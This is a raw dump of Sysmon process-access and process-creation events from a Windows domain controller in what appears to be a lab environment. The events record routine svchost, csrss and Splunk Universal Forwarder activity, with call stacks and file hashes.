13:55:55.026{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007347Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:55.026{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007346Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:55.026{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007345Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:55.026{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007344Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:55.026{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007343Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:55.026{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007342Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:55.026{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007341Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:55.026{10ACEC4A-853E-5FCF-0500-000000009101}644660C:\Windows\system32\csrss.exe{10ACEC4A-85EB-5FCF-3101-000000009101}4900C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007340Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:55.026{10ACEC4A-85EA-5FCF-2C01-000000009101}41404276C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe{10ACEC4A-85EB-5FCF-3101-000000009101}4900C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4022c|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+403f8|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+404c7|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+40fee|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+13671|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+18192|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+1adfc|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4cf68|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000007339Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:55.040{10ACEC4A-85EB-5FCF-3101-000000009101}4900C:\Program Files\SplunkUniversalForwarder\bin\btool.exe8.0.2btoolsplunk ApplicationSplunk Inc.btool.exe"C:\Program Files\SplunkUniversalForwarder\bin\btool" validate-strptime --log-warningsC:\Windows\system32\NT AUTHORITY\SYSTEM{10ACEC4A-853F-5FCF-E703-000000000000}0x3e70SystemMD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B{10ACEC4A-85EA-5FCF-2C01-000000009101}4140C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal pre-flight-checks --answer-yes --no-prompt 10341000x80000000000000007552Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:56.947{10ACEC4A-85E9-5FCF-1F01-000000009101}31363920C:\Windows\system32\conhost.exe{10ACEC4A-85EC-5FCF-4001-000000009101}4800C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007551Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:56.947{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007550Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:56.947{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007549Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:56.947{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007548Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:56.947{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007547Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:56.947{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007546Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:56.947{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007545Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:56.947{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007544Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:56.947{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007543Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:56.947{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007542Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:56.947{10ACEC4A-853E-5FCF-0500-000000009101}644792C:\Windows\system32\csrss.exe{10ACEC4A-85EC-5FCF-4001-000000009101}4800C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007541Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:56.947{10ACEC4A-85E9-5FCF-1B01-000000009101}18404240C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{10ACEC4A-85EC-5FCF-4001-000000009101}4800C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7d35e7|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7cdcb9|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca4ec|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca0a3|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7c9f0d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6d7908|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6de2ee|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b29fa|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b4274|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e42dc|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ec682|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e9959|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+d7f31|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000007540Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:56.949{10ACEC4A-85EC-5FCF-4001-000000009101}4800C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c ""C:\Program Files\SplunkUniversalForwarder\etc\system\bin\WinHostMon.cmd" --scheme"C:\Windows\system32\NT AUTHORITY\SYSTEM{10ACEC4A-853F-5FCF-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{10ACEC4A-85E9-5FCF-1B01-000000009101}1840C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000007539Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:56.837{10ACEC4A-85E9-5FCF-1F01-000000009101}31363920C:\Windows\system32\conhost.exe{10ACEC4A-85EC-5FCF-3F01-000000009101}3356C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007538Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:56.837{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007537Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:56.837{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007536Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 